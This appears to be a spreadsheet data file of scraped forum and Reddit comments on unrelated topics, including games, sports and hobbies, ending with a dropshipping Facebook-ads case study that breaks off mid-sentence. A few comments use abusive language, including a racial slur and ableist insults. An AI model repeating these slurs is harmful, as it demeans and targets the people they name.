    <t>Aye me and Retro to our credit were some of the first to suggest Greek Mythology would something to do with Death Stranding. We used SurviVe what's meant to be a completely different game from totally separate company and team in order to reach this conclusion. One thing I in particular noted was Trailer 2 CLIFF emerging from a river of dead. Made me think of The River Styx. Which the last time we saw appear in a Metal Gear Solid game was Metal Gear Solid 3: Snake Eater. With that in mind SurviVe having a company conveniently named Charon Corps are what further drove this suspicion. As for the other stuff we didn't stumble onto that until at least a little later, but damn in many cases we've been spot on. This is not to discredit anyone else. I've always did my best to explain that a lot of the theories I espouse were suggested by other people despite the exception of a few to which I've just weaved together in order to get a coherent picture.</t>
  </si>
  <si>
    <t>ErkiHUN</t>
  </si>
  <si>
    <t>Upgraded the last one</t>
  </si>
  <si>
    <t>Lesan007</t>
  </si>
  <si>
    <t>They usually aren't that bad, probably just arrogance or nerves from Beryl and Nuclear</t>
  </si>
  <si>
    <t>santamurtagh</t>
  </si>
  <si>
    <t>My mom AMD I are both under the belief that if we would let ourselves "even out" we would not have 24 hour rhythms which is a medical thing. You might not be broken, just different.</t>
  </si>
  <si>
    <t>KingOfRisky</t>
  </si>
  <si>
    <t>I can't wait until the whole volcano thing is gone. The volcano was the beginning of the end with this map.</t>
  </si>
  <si>
    <t>imanAholebutimfunny</t>
  </si>
  <si>
    <t>actually legends tells he whistled to her in this picture</t>
  </si>
  <si>
    <t>rice</t>
  </si>
  <si>
    <t>Paul Lewis' Beethoven sonatas, piano concertos, and Diabellis are being rereleased as a box. They probably won't, but I hope they put the sonatas in numerical order this time.</t>
  </si>
  <si>
    <t>Greshloc</t>
  </si>
  <si>
    <t>An award for a single movie's performance might not be right but RDJ definitely deserves some recognition for his decade long portrayal of the character.</t>
  </si>
  <si>
    <t>dduusstt</t>
  </si>
  <si>
    <t>I haven't had text or voice on in pubs since like a week after release. nothing requires them and I'm usually talking to people on discord anyway. chat was a bad idea to begin with</t>
  </si>
  <si>
    <t>Jarf710</t>
  </si>
  <si>
    <t>It’s way too expensive and I don’t really want to steal it.</t>
  </si>
  <si>
    <t>&gt;&gt;194108283 I saw it in the threads and read it, it's definitely good, but there's nothing that you can really discuss about it though, since it's like, mini stories/adventures.</t>
  </si>
  <si>
    <t>MentalMaybe</t>
  </si>
  <si>
    <t>This.</t>
  </si>
  <si>
    <t>zzzogas413</t>
  </si>
  <si>
    <t>Yeah just take it easy. You typically won't start to really feel the effects of what kind of damage you did to yourself on the bike until around mile 15-16 on the marathon and it will be too late at that point to change anything. Giving up 15-30 min on the bike could mean saving yourself double that or even more on the run.</t>
  </si>
  <si>
    <t>Pyle1214</t>
  </si>
  <si>
    <t>The bronze</t>
  </si>
  <si>
    <t>dollar6767</t>
  </si>
  <si>
    <t>ok thanks</t>
  </si>
  <si>
    <t>SpookyRedheadRabbit</t>
  </si>
  <si>
    <t>"And so my evil waifu villainess stabs the rogue's knees so they can't sneak anymore. Mwahaha!" "............... I cut off your waifu's cat tail." "NOOOOOOOOOOOOOO!!!!!!!!!!!"</t>
  </si>
  <si>
    <t>AMeanMotorScooter</t>
  </si>
  <si>
    <t>I heard somewhere that they are being told to lie, but by B. Rob and Sandra. I guess that's the lie they're telling those who come to say back at camp.</t>
  </si>
  <si>
    <t>iamthebeaver</t>
  </si>
  <si>
    <t>if the rays get past the astros, a huge if, I'm rooting for the rays to win it all.</t>
  </si>
  <si>
    <t>cacapepee</t>
  </si>
  <si>
    <t>Ramirez is the goat!</t>
  </si>
  <si>
    <t>piind</t>
  </si>
  <si>
    <t>Holy shit this guy is the real life forest gump. With the whole running thing and everything</t>
  </si>
  <si>
    <t>Springinberlin</t>
  </si>
  <si>
    <t>If they are still packed it is less likely for them to break if you hold them head down; they also don't dry that fast.</t>
  </si>
  <si>
    <t>OG_Panthers_Fan</t>
  </si>
  <si>
    <t>People asking 'bout Uncle 8 Track, but nobody mentions Great Aunt Reel-to-Reel.</t>
  </si>
  <si>
    <t>MBH81</t>
  </si>
  <si>
    <t>These two wireless rear speakers complement the SK8YG sound bar. Nice and small. \nOne note is the speakers are wired to a receiver box that has to be plugged in.</t>
  </si>
  <si>
    <t>sirgiraffe77</t>
  </si>
  <si>
    <t>People in my country think that we’re the only country that matters.</t>
  </si>
  <si>
    <t>VanillaGorilla75</t>
  </si>
  <si>
    <t>Admit it... Or are you keeping quiet so you have more chance of chalking up number 131 on the bed post. She asked, be HONEST. Yes, it is the best policy.</t>
  </si>
  <si>
    <t>SevenLeafClov3r</t>
  </si>
  <si>
    <t>8 gold and 6 silver in &lt;9 hours. This has to be some sort of record.</t>
  </si>
  <si>
    <t>electi0neering</t>
  </si>
  <si>
    <t>If there is one.... I’m starting to feel like that’s actually a possibility</t>
  </si>
  <si>
    <t>jredbrown</t>
  </si>
  <si>
    <t>The blanket is warm but it's not very comfortable in general. Color is great, texture looks nice but it's just not that usable of a blanket.</t>
  </si>
  <si>
    <t>thejalla</t>
  </si>
  <si>
    <t>Not 100% sure if this is true but I've been told that Tine is obligated to pick up milk from any farmer that wants them to, which leads to some really long and uneconomical trips in some places to fetch really minor amounts of milk. So in some fringe cases, they might not be able to do so with current designs.</t>
  </si>
  <si>
    <t>JayJay_Tracer</t>
  </si>
  <si>
    <t>The game is called Endless for a reason</t>
  </si>
  <si>
    <t>Matchy69</t>
  </si>
  <si>
    <t>Thanks Sarah for reminding me about the Worlds fastest Indian.I just found it and will watch it when i can have a kid free moment</t>
  </si>
  <si>
    <t>canadiantirefire</t>
  </si>
  <si>
    <t>mcdonagh4captain said: ↑ Hopefully he’s in the N next year. Kid is an NHL caliber goal scorer right now. Should have made it this year. Click to expand... No doubt his shot and goal scoring ability is NHL ready but is the rest of his game? Time will tell. The hype over Suzuki and Poehling has fallen flat, although to be fair preseason hype for young players almost always does.</t>
  </si>
  <si>
    <t>HerboftheSerb</t>
  </si>
  <si>
    <t>Just posted two saved clips and they aren’t in HD. All past videos have been posted in HD and my settings on YouTube and the PS4 are how they should be, nothing has changed. Any ideas at what may be going on?</t>
  </si>
  <si>
    <t>Arthur_Edens</t>
  </si>
  <si>
    <t>If it's anything like the rest of country, football would be significantly lower. [Nationally FBS is 79%, compared to say, skiing, at 96%.](http://www.ncaa.org/about/resources/research/division-i-graduation-rates-database)</t>
  </si>
  <si>
    <t>styuone</t>
  </si>
  <si>
    <t>Because Barnier confirmed they will lose their veto on potentially creating new arrangements for N.I which they would have done in a heartbeat to create a hard border in 4 years time.</t>
  </si>
  <si>
    <t>Is_J_a_Name</t>
  </si>
  <si>
    <t>Patiphan's kind of a nuts Doomfist too</t>
  </si>
  <si>
    <t>Raqriz</t>
  </si>
  <si>
    <t>Thay entire sub is literal trash and comments taken out of context when also jerking themselves off about how amazing they are and how bad America is. I'm guessing its nothing but edge lord kids from the US and Europeans with their head up their own asses.</t>
  </si>
  <si>
    <t>aStonedTargaryen</t>
  </si>
  <si>
    <t>It’s more than just the ridiculous overkill though, it’s that you made this insanely complicated anchor that in the end isn’t even very safe because the cord has no redundancy. Congrats you have defeated your own purpose. If you are going to use a sliding X at least tie limiter knots ffs.</t>
  </si>
  <si>
    <t>VillaGave</t>
  </si>
  <si>
    <t>Negative on the Blackberry phones my last phone was the Priv and was a good dan phone then the battery died , bought a new phone tu el replaced the battery on the Priv and is back to being like new but now In stuck with 2 phones . And the Key 2 is doing really well .</t>
  </si>
  <si>
    <t>MFNFarva070</t>
  </si>
  <si>
    <t>Am I the only fatass that thought this was an Oreo, while aimlessly scrolling reddit on Wednesday morning because I have nothing better to do with my life?</t>
  </si>
  <si>
    <t>&gt;&gt;12998032 &gt;fasted 6 hours lel &gt;only meat Expect turds hard as bricks if not full on constipation. You should be taking vitamin and mineral suplements if you dont want to die.</t>
  </si>
  <si>
    <t>Trad_MetalMod_Wife</t>
  </si>
  <si>
    <t>It's good. Try it.</t>
  </si>
  <si>
    <t>**[Your](/u/jddgfhdhrhbhks) post has been automatically removed because you used a terrible title.** **Please resubmit with a better title.** Do not tell us where you found your badass, whether you think it counts, or if you forgot to censor personal information last time. Do not complain about automod removing your posts for having bad titles. Please make your title descriptive of the content of your post and resubmit. Use a quote if you cant think of anything. **If you're really struggling or believe this removal was in error, report this comment and a mod will check it out.** --- Please censor all information that can be used to identify a person. This includes, but is not limited to: first and last names, usernames (including your own), the symbol next to your username identifying it as your own, your own stupid comments tagging the sub, profile pictures where a person's face is visible, subreddit, group, and online community names, titles of specific posts, and other information like locations (city, state, etc.), addresses and license plates. This is to prevent brigading and harassment, so we take this rule very seriously. --- Below automod will tell you to send a modmail. **DO NOT SEND A MODMAIL, WE WILL MAKE FUN OF YOU** *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/iamverybadass) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>smokingthegateway</t>
  </si>
  <si>
    <t>Hey, so I work in a hotel where cocktails aren’t particularly popular and I’m kind of viewed as the “guy who does the cocktails” even though I realistically have very little experience and the only thing that sets me apart is that I find mixology really interesting. So long story short I’ve got to give a relatively nonchalant cocktail course tomorrow and break down how to make some cocktails for a small group. Any advice would be really welcome as I’m feeling kind of nervous about it.</t>
  </si>
  <si>
    <t>EnviousCipher</t>
  </si>
  <si>
    <t>Spanish Hornets don't land on carriers. We only got the LITENING on the Hornet because the USMC run it on the centerline. Running LITENING on the cheek station requires an adapter or modifications to the station avionics to mount it that the USN didn't bother with since they had ATFLIR and the Marines didn't bother with since they only ran it from land based Hornets filling the FACA mission on Delta Hornets. The USN doesn't use LITENING off a boat because it's too fragile for carrier operations, hence ATFLIR. The only reason we have it is because Hoggit was whinging so hard and it's technically correct for US service though there's no practical way to restrict it to land use. Realistically speaking you shouldn't be using it off a boat at all.</t>
  </si>
  <si>
    <t>f6engineer</t>
  </si>
  <si>
    <t>Joining the Marines, followed by leaving the Marines after 10 years.</t>
  </si>
  <si>
    <t>lvkeskywalter</t>
  </si>
  <si>
    <t>&gt;I was disappointed as well, but gaining that point was kind of important. Now, the only way we don't make the playoffs is if Dallas wins AND we lose. Without that point, a loss and Dallas tie would've knocked us out. BF is from Argentina though and as far as I know, they dont use that word . However, he could have picked up the bad habit form his years in Liga MX?</t>
  </si>
  <si>
    <t>I_am_Nic</t>
  </si>
  <si>
    <t>Probably has to do with the GoFundMe campaigns for people who don't have insurance :P</t>
  </si>
  <si>
    <t>MrSpindles</t>
  </si>
  <si>
    <t>Possession of portaloos and disabled access ramps. We live in dangerous times.</t>
  </si>
  <si>
    <t>eucalyptusqueen</t>
  </si>
  <si>
    <t>Yeah I love all these comments like "just move to the south or small midwest city!" Um fuck no, I don't want to live there. I would be miserable because the culture just doesn't work for me. I'd rather rent forever than live in either of those places.</t>
  </si>
  <si>
    <t>frososaggins</t>
  </si>
  <si>
    <t>I mean you just used “trumpanzee” unironically so if that doesn’t prove you’re a total dip shit then just keep talking and I’m sure youll say something even more retarded</t>
  </si>
  <si>
    <t>ucfstudent386</t>
  </si>
  <si>
    <t>Having been going to see the band every tour since 2002, this show was up there. Amazing energy from the crowd, the band. The sound from my seat was amazing. Danny was absolutely flawless the entire night, I don’t know how they do it, I was getting tired just watching them. They blew the roof off the place. Signed posters were gone before they even opened the doors, and I was one of the first ones in. Had to settle for unsigned poster. Worth every penny, flying back home In morning.</t>
  </si>
  <si>
    <t>dwarfcomic</t>
  </si>
  <si>
    <t>Just throw it in the trash.</t>
  </si>
  <si>
    <t>Lambamham</t>
  </si>
  <si>
    <t>Same, my cat only likes his one type of food and it’s just out in a bowl all the time so he wouldn’t have any interest in it if i held a chunk up. He does like Doritos though...</t>
  </si>
  <si>
    <t>papulako</t>
  </si>
  <si>
    <t>wow thanks this is very useful! I noted that you assume that I have a base to go back to, so I guess I have to do that, but how can I choose the best spot? what should I look for?</t>
  </si>
  <si>
    <t>rudges</t>
  </si>
  <si>
    <t>Brown for Hooper? Guy with Gurley is 1-4 and needs all the help he can get. I've got Engram, who is out.</t>
  </si>
  <si>
    <t>Marie</t>
  </si>
  <si>
    <t>When arrived our room had a shower but was able to change to one with a bath . could have more gluten free selection . As we double booked ourselves the reception contacted us and rearranged everything.the reception service was helpful and friendly and was full of smiles and chat.morning breakfast was fast and friendly service. Stayed in October 2019</t>
  </si>
  <si>
    <t>BMXTKD</t>
  </si>
  <si>
    <t>He's from Michigan. It's not that much of a transition.</t>
  </si>
  <si>
    <t>&gt;&gt;811555569 Yeah, it's the "lower your bills" plan. And there's no way I'm burning money on batteries or a shitty ev.</t>
  </si>
  <si>
    <t>fkilling</t>
  </si>
  <si>
    <t>Thank you for sharing</t>
  </si>
  <si>
    <t>GutsyDragoon666</t>
  </si>
  <si>
    <t>I think everyone can relate to this post in one way or another</t>
  </si>
  <si>
    <t>SpicerJones</t>
  </si>
  <si>
    <t>Completely understandable. For me - I love SuperHot and Beatsaber - this looks like it could be a good mash between the two. Having good artificial motion is also exciting - I have my VR legs so I prefer having that mapped to my analog, but for people I demo my Quest to, this could be a nice transitional game to give them a little vertical slice of what VR gameplay is and can be evolved from.</t>
  </si>
  <si>
    <t>jacrispy704</t>
  </si>
  <si>
    <t>Bojangles won’t be serving turkey this year. What are we going to do about this, Charlotte?</t>
  </si>
  <si>
    <t>glass-butterfly</t>
  </si>
  <si>
    <t>right but they don't really fit into the "free and democratic" part of the meme.</t>
  </si>
  <si>
    <t>RoninMountain</t>
  </si>
  <si>
    <t>“We’re 4-0 and we haven’t played our best hockey yet” that right there should be a chilling quote for the rest of the NHL.</t>
  </si>
  <si>
    <t>Amikel0315</t>
  </si>
  <si>
    <t>Quote: Originally Posted by TheWoodBoss Don't waste your money, the motorhome is designed for the 19.5" wheels. You will open up a can of worms, gearing, braking, clearance, speedometer recalibration. If you are renting your motorhome I'm sure you will have something to spend your money on soon enough. I don't like ape hangers either...lol Your answer is the most clear of the board! Thanks lol I think the discussion is over....19's it is! hoping to have a new rig by the time Im 40!</t>
  </si>
  <si>
    <t>HauntedJackel</t>
  </si>
  <si>
    <t>People hate just to hate man.</t>
  </si>
  <si>
    <t>Enderman</t>
  </si>
  <si>
    <t>2 hours ago, battlebox56 said: The weird high pitched sound is coil whine. Now my laptop drains battery like crazy and gets insanely hot in sleep mode. SSDs don't have coil whine because they don't have coils.</t>
  </si>
  <si>
    <t>maggiemae2323</t>
  </si>
  <si>
    <t>I don't really have advice on the videographer, but we're doing a similar thing with our photographer- getting a great deal because they're new-ish to the business and still working on their portfolio. I think this can work if you do your due diligence - google them, google the company they used to work for, look up any fb pages they have, ask for references (even if it's from a wedding he was a second shooter at), and MAKE SURE you get a very clear contract. I think if you're slightly skeptical and do your research this could definitely work</t>
  </si>
  <si>
    <t>silverslant</t>
  </si>
  <si>
    <t>Ah, first season too? Ftfy</t>
  </si>
  <si>
    <t>kelsie3445</t>
  </si>
  <si>
    <t>I'm not a teacher, but I won't be eligible for FMLA at my company either. I started working this past June. They specifically have a policy for maternity leave when you've been working less than a year. It's 8 weeks of unpaid leave, without the guarantee that you'll have your same job, but they do state they try to keep you in your same or a similar role. I'd go through all of your policies and see if you have anything that pertains to leave other than FMLA.</t>
  </si>
  <si>
    <t>nhay2568</t>
  </si>
  <si>
    <t>ESPN: rodgers to cowboys confirmed</t>
  </si>
  <si>
    <t>Euronymous_Bosch</t>
  </si>
  <si>
    <t>If we can pitch the idea of using this to David Lynch, Susan may finally meet his hero.</t>
  </si>
  <si>
    <t>vmulla</t>
  </si>
  <si>
    <t>@Pg3ibew, First off, congrats! You will love it. I did not see center console wrap in your list, order it if you haven't already. Do not forget to leave a review - first drive, first road-trip, first software update...everything. If there are things that you think can be improved share them, that's a sign that you've really taken to the car and see it's possibilities.</t>
  </si>
  <si>
    <t>CascadesBrewer</t>
  </si>
  <si>
    <t>Ahhh...I am not sure how accurate the table from Palmer is, but it does seem like BS only applies a small gravity to steeped grains, and it seems to apply similar values to all grains. I tried adding 10 lbs of the following malt as steeped to that test 1.087 batch and got: * 10 lbs Pale 1.098 (+.011) * 10 lbs Crystal 20 1.098 (+.011) * 10 lbs Black 1.095 (+.008) * 10 lbs Wheat 1.099 (+.012)</t>
  </si>
  <si>
    <t>allhailjtodd</t>
  </si>
  <si>
    <t>Imagine making a burner reddit account just to comment on a post you didn't like. And then in that same breath, tell someone to stop wasting other people's time.</t>
  </si>
  <si>
    <t>MegaPupu</t>
  </si>
  <si>
    <t>This is not a question about gameplay but I thought that it would be appropriate to ask here. I have heard that the rates are brutal in this game and since most of the husbando that I like (just for their looks) are either in the high rarity and/or limited, should I play this game? I am not sure if there is any pity system and I don't want another game to cause me a heartache (lame, I know...). So, would you guys advise me to start/play this game considering that many people are playing this game for their husbando/waifu I assume?</t>
  </si>
  <si>
    <t>MrsRadioJunk</t>
  </si>
  <si>
    <t>Maybe take a look at or reach out to an enrollment counselor at one of your ideal schools. I think the biggest reason for this being a good idea is if someone gets them years apart so you're not just overwriting your degree, you're refreshing it. Good luck!</t>
  </si>
  <si>
    <t>Bumblebee1510</t>
  </si>
  <si>
    <t>The beginnings of your base are pretty nice. One tip I would give you is to add blocks such as andesite and stone to the cobblestone walls to add more variation. It’s a small change, but adding a small amount of variation can really make a difference. You can also add some variation to the roof by adding some slabs or even using full blocks.</t>
  </si>
  <si>
    <t>JayKayLay</t>
  </si>
  <si>
    <t>What's the black thingy below?</t>
  </si>
  <si>
    <t>A-real-human-person_</t>
  </si>
  <si>
    <t>"No collusion!" "Okay collusion but there wasn't a quid pro quo!" "Okay there was a quid pro quo, but it wasn't corrupt!" The first one is illegal, but by controlling the narrative Fox keeps trying to confuse the public. This shit is so frustrating to see because people believe it.</t>
  </si>
  <si>
    <t>Trik'Stari</t>
  </si>
  <si>
    <t>I really want this to go through so games like this can die the fiery death they deserve.</t>
  </si>
  <si>
    <t>skippygold</t>
  </si>
  <si>
    <t>I'm using this in my PhD..</t>
  </si>
  <si>
    <t>_SEGA</t>
  </si>
  <si>
    <t>I know this is tough even for veterans. I book it all the way to the back of the room and up the stairs asap and kill the dogs. Then i jump down and swing on capra demon. I circle back around while rolling and head back up the stairs and repeat until hes dead.</t>
  </si>
  <si>
    <t>Kelog13</t>
  </si>
  <si>
    <t>Not really, unless it’s with a girl who I’m interested in LOL then I’m a hot mess. As for in person, sometimes it’s bad and sometimes it’s not, but the difference with being online is I can avoid talking to people when I’m not in a good mood. There’s only a few of my closest friends who I’ll talk to all of the time.</t>
  </si>
  <si>
    <t>Freeloading_Sponger</t>
  </si>
  <si>
    <t>So your view... has changed?</t>
  </si>
  <si>
    <t>FlyMolo_A</t>
  </si>
  <si>
    <t>I'm looking at buying one of the Norse beanies. Anyone know what makes the "top" beanie $5 less?</t>
  </si>
  <si>
    <t>FockeWulfStudent</t>
  </si>
  <si>
    <t>You might be right, I try to do more research next time, but might be quite hard since the theory and the way it actually goes is quite a shitshow. Thanks for your discussion though. Now go to bed!</t>
  </si>
  <si>
    <t>supertranqui</t>
  </si>
  <si>
    <t>Talking about things totally irrelevant to the OP, it's pretty sad that the browns won 4 games from the 2015 season through the 2017 season.</t>
  </si>
  <si>
    <t>snoozeflu</t>
  </si>
  <si>
    <t>I had one of these up on the wall of my living room one year and it scared the shit out of me. I didn't know how to get rid of it so I sucked it up with the vacuum.</t>
  </si>
  <si>
    <t>jmj1970</t>
  </si>
  <si>
    <t>Right. When Christ comes again, it will be complete. He came because it was complete. If you are trying to calculate the date of completion or try to figure out when Christ will come again, don’t. Scripture warns against doing that.</t>
  </si>
  <si>
    <t>bluesteel117</t>
  </si>
  <si>
    <t>Turo double dips with the insurance also.</t>
  </si>
  <si>
    <t>Whizgigger</t>
  </si>
  <si>
    <t>What is it with *Jared's*</t>
  </si>
  <si>
    <t>extraes</t>
  </si>
  <si>
    <t>[r/tooyoungforreddit](https://reddit.com/r/YouFellForItFool/comments/cjlngm/you_fell_for_it_fool/)</t>
  </si>
  <si>
    <t>notfun_87</t>
  </si>
  <si>
    <t>at first I was a bit 'meh' about the whole remasters thing, but seeing how much crap is being put on the market, I for example would have bought mass effect trilogy remastered rather than have half-baked made-in-hurry masseffect andromeda.</t>
  </si>
  <si>
    <t>ultraskinder_</t>
  </si>
  <si>
    <t>Your comment: “Moderate and limited should be dependent from income. Its not.” Income does play a very big role in alimony and child support. Very much so. You’re the one claiming otherwise.</t>
  </si>
  <si>
    <t>&gt;&gt;42856773 Notice the “wartime production” part. Pre-war Soviet rail stock absolutely dwarfed the LL numbers. While a lot was destroyed, everything in the interior still remained to move supplies from the factories behind the urals to the front.</t>
  </si>
  <si>
    <t>stagepony</t>
  </si>
  <si>
    <t>The Technics SL 1200 was originally designed for hifi and sort of "evolved" to the DJ player it is known for. If the one you could get was never used live - go for it! If the unit was moved often (for live use etc) the platter bearing and also the cardan shaft of the tonearm could have taken damage, expecially if not transported correctly. I'd ask the seller about that and also the player's past (if known). Try moving the tonearm a bit - if the cardan shaft makes any noice (clicking) or if you can twist the tonearm slightly around it's own axis (seen from the front) don't get it. This could indicate a damaged cardan joint and would mean it should be serviced. The tonearm should be able to move easily. You could set the counterweight to 0 and tap the tonearm. If the tonearm bounces up and down at least 2-3 times you've got a good one. With a decent hifi cartridge the 1200 is an awesome player. If it's in good shape, it'll last you a long time. (Hope this post is at least somewhat helpful, I'm not a native english speaker)</t>
  </si>
  <si>
    <t>mattgfx</t>
  </si>
  <si>
    <t>Storing used wet MF towels: I like to wash my towels once a month (I only wash my car twice a month) and after doing an ONR wash my towels are wet and dirty. How can I store them for a month without getting a nasty mildew smell? Can I store them in a sealed bucket of APC for a month or will that degrade the towel and just allow mold to grow?</t>
  </si>
  <si>
    <t>ItsAlif</t>
  </si>
  <si>
    <t>Why not it's cancer</t>
  </si>
  <si>
    <t>MeisterTython</t>
  </si>
  <si>
    <t>Sport and Meditation are great ways to kill the urges.</t>
  </si>
  <si>
    <t>Hello /u/Blitxer! Unfortunately, your post has been removed. To protect the subreddit from advertising spam, ban evasions and abuse, we no longer allow new/inactive users to make submissions, you need to build up some post, comment karma and history. In the mean time, please be sure to familiarize yourself with our sidebar rules: &gt;/r/memes/about/rules &gt; &gt;r/memes/about/sidebar In order to achieve the threshold, we ask you to post to other subs around Reddit, and contribute in comments to build up your post and comment karma. You can hover over your karma on your profile to see the difference between post and comment karma, as we do **not** evaluate your overall karma. This may explain why you often see someone with "higher" overall karma able to post. *You are welcome to comment in r/memes* in order to spend some time getting to know our community, then you'll be welcome to make submissions. Thanks for understanding. --- #Please do not message us about this, we will probably mute you and move on with our day. --- *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/memes) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>Magnificent_Butcher</t>
  </si>
  <si>
    <t>so one thread = consistency? yeah i'm not really sure that fits the definition of the word. I think you mean the word "selective". As in "I've been very selective on being favorable to the idea of standardizing the ratings threads." Funny you say you cant unilaterally make changes either, because one of you mods certain can, and did [create and enforce a ratings thread title rule.](https://imgur.com/a/apw5zyY#JWZChAd) Wonder which one that was.</t>
  </si>
  <si>
    <t>trapshitonly_</t>
  </si>
  <si>
    <t>SaladFury</t>
  </si>
  <si>
    <t>Wait till you need to get auras for bossing. Mtx are still prevalent in IM mode</t>
  </si>
  <si>
    <t>Thatone94</t>
  </si>
  <si>
    <t>Grinding g pillow between your legs? Could you expand on this? I hate masturbating but don’t have the self control to stop :(</t>
  </si>
  <si>
    <t>&gt;&gt;34459170 &gt;&gt;34459213 I'll bite. What specific verb in that post was supposed to be "fapped"?</t>
  </si>
  <si>
    <t>alanworland</t>
  </si>
  <si>
    <t>Thanks, and sorry you have so many! I think get the meter out check supplies etc then attack the electrolytic caps. Having searched for the service manuals/schematics it seems these underwent quite a few changes since introduction. Battery elimination sounds good but a cheaper solution would be to mount the battery on the rear panel for easy access and it's non destructive leak potential! although I don't really have a problem with retuning to be honest. Alan</t>
  </si>
  <si>
    <t>&gt;&gt;42873077 That's not what the thread is about you retarded nigger</t>
  </si>
  <si>
    <t>&gt;&gt;52668877 I lost my fat when I had pretty much zero strength training knowledge. I'm planning on losing my fat the same way I lost it in the past, that is, through intermittent fasting, but I don't know how I should train. Should I do the same training with the same intensity, or will that just tear apart my muscle and make me lose more muscle than I should?</t>
  </si>
  <si>
    <t>MuLDeRiZeD</t>
  </si>
  <si>
    <t>Much appreciated!</t>
  </si>
  <si>
    <t>DutchLime</t>
  </si>
  <si>
    <t>How is franchise mode? I’m guessing that it’s essentially the exact same, but it’s still my favorite mode from the past games</t>
  </si>
  <si>
    <t>ZenYeti98</t>
  </si>
  <si>
    <t>You got it to work on Straightalk?</t>
  </si>
  <si>
    <t>Haaniina</t>
  </si>
  <si>
    <t>You sir deserve many upvotes for such dedication to information. Given its the internet i just expected like “he hit a girl” haha nope hes just stupid. Thank you.</t>
  </si>
  <si>
    <t>fierdracas</t>
  </si>
  <si>
    <t>When I went to Ireland about 20 years ago, I discovered Kerry Gold and liked it so much I seriously considered bringing some home on the plane with me. I didn't because I didnt want a suitcase full of melted butter.</t>
  </si>
  <si>
    <t>addisonshinedown</t>
  </si>
  <si>
    <t>I support whistleblowers period. If they feel like the people are being deceived or rights being taken away, and they choose to speak up they’re doing a good thing, even if I wildly disagree with their position, it’s the morally correct choice</t>
  </si>
  <si>
    <t>SpookyKitty551</t>
  </si>
  <si>
    <t>LittleBitWeird said: ↑ Not you, Mr. Kitty. xD Click to expand... I'm a girl :3</t>
  </si>
  <si>
    <t>TheYellowChicken</t>
  </si>
  <si>
    <t>I'd say at least 20+/6/3 while maintaining his efficiency and good defense</t>
  </si>
  <si>
    <t>Verum____</t>
  </si>
  <si>
    <t>**$500K Selling A Posture Brace With Facebook ™ Ads** This is a case study on a recent store of mine that focused on selling a posture brace. This will focus on the ads strategy side. I'll post another with the product research side for those who are interested. &gt;**Our numbers:** &gt; &gt;$528,000 in sales after accounting for returns &gt; &gt;$300,000 in ad spend between the two ad accounts &gt; &gt;$79,0000 in COGS &gt; &gt;This left us with roughly $149,000 in profit or 28% profit margins. Not bad for two months on one product. **5 PHASE ADS STRATEGY** This strategy is broken down into 5 easy phases that will work great for anyone trying to run a 1-product store. As a bonus, I’ll also be going over how to get around Facebook disabling ad accounts because that’s what happened multiple times while running this store. **PHASE 1 - TESTING PROCESS ROUND 1** The campaign and adset structure for this phase and all of the phases that follow are very similar. Refer back to this point in the video when you’re setting up ads for each phase and use these settings. All of the phases use campaigns with buying type set to auction and objective set to conversions. We turn campaign budget optimization on and set bid strategy to lowest cost. The daily budget depends on the phase that you’re in. For adsets, we optimize for purchase, and set new adsets to start the next day. For location, we target our special ePacket list which can be found in the facebook group. We let facebook decide the age and gender for the most part, but we will sometimes end up narrowing that down if we see performance for certain demographics underperforming. When we’re starting ads though, we almost always just let facebook decide. Even if we’re selling a men’s product, we’ve noticed that Facebook can still find female buyers for us - especially as campaigns optimize. Language should always be set to English(all) unless you’re running ads in a foreign language. For detailed targeting, or interest targeting as we like to call it, we make sure to exclude dropshipping as an interest. This is going to help hide your product and store from other dropshippers looking to sell the same product. The interests we include change for each phase, and we don’t include any interests when we’re targeting Custom or Lookalike audiences. We leave placements on auto, optimization on conversions, and conversion window on 7 day view 1 day click. Using those settings in Phase 1, we set a daily campaign budget of $200. If that’s too expensive, you can use a smaller budget than we did, but in that case, just test less adsets. We test 10 adsets with our $200 budget, so if you have a $100 budget, you should test 5 adsets. For our 10 adsets in this campaign, we targeted interests related to posture. The interests I used included Vertebral column, shoulder, neck, spinal cord, poor posture, cervical vertebrae, lumbar vertebrae, aging, massage, and old age. Note: You shouldn’t think too hard about what to target, just pick something broad with at least a few million people that you think might work. Then use the suggestions feature to find more interests once you have a few in mind that you want to target. For our initial tests, I started with poor posture which is an obvious fit for the product, and then used suggestions to find the rest. When you’re going through these suggestions, make sure the majority of your audiences have at least 5m people. Some of my interests actually have over a hundred million. The benefit of starting with broad interests is that they’ll give you much cheaper impressions and allow you to scale anything that’s profitable without worry about burning out your audience. For each adset, we also set a minimum spend of $10 for each adset using our rule of distributing half the CBO budget evenly amongst the adsets. Then we tested 2 different ads for each adset, but we actually recommend you to test 3 ads when you’re trying this. Since running this store, we’ve noticed that three has been performing equally as well while allowing you to test more creatives with the same budget. If a campaign wasn’t profitable as a whole we’d normally kill it after 2 days. When you’re analyzing your campaign after two days, you’re looking for any adsets that are profitable. If your adsets haven’t even spent your target cost per purchase yet though, you should be looking for metrics like cost per add to cart that indicate it will be profitable later down the line. As far as your different video ads go, you want to look for the video ad with the best performance on Average Video Watch Time and Cost Per Link Click. If you run this campaign for two days and find that none of your adsets are even close to being profitable, then I would scrap all of your creatives and start again from there. If all of your adsets are performing equally bad, it’s a good indicator that your creative is just not good enough. If you test new creatives and they do bad again, it could be your product as well. The last hope in this case, would be to skip to phase 3 once you have enough data, but you could also save your money and start over again on a new product. Anyways, once you have an adset and ad that you think are working, move onto phase 2. Don’t forget to kill your Phase 1 campaign if it’s not profitable as a whole. **PHASE 2 - TESTING PROCESS ROUND 2** In phase 2, we took the best performing interests and creatives to make another $200 CBO. Since we had two winning interests, we duplicated each one five times to get a total of 10 adsets. We continued to set a minimum spend of $10 according to the rule from earlier. Depending on the number of adsets you’re taking from Phase 1, you should duplicate each of them enough times to have roughly the same total number of adsets as Phase 1. For example, if you found three winning adsets in Phase 1, you should duplicate them 3 times each for a total of 9 adsets in phase 2. It’s not exactly 10, but the goal here is to just get close. You should also duplicate your winning video creative 3 times for each adset. The idea behind this has to do with Facebook Artificial Intelligence and the differences in starting optimization for each adset, but that’s a topic for another video. When we ran this campaign, our results were disappointing to say the least. In fact, it did worse than the original campaign, but that’s just how Facebook is sometimes. Luckily, the point of Phase 2 is just to gather enough data to move onto LookAlike Audiences in Phase 3. Of course, it would be nice to make money at this point, but even if you don’t, you can just move right on to phase 3 as soon as there’s enough data. That’s exactly what we did here - 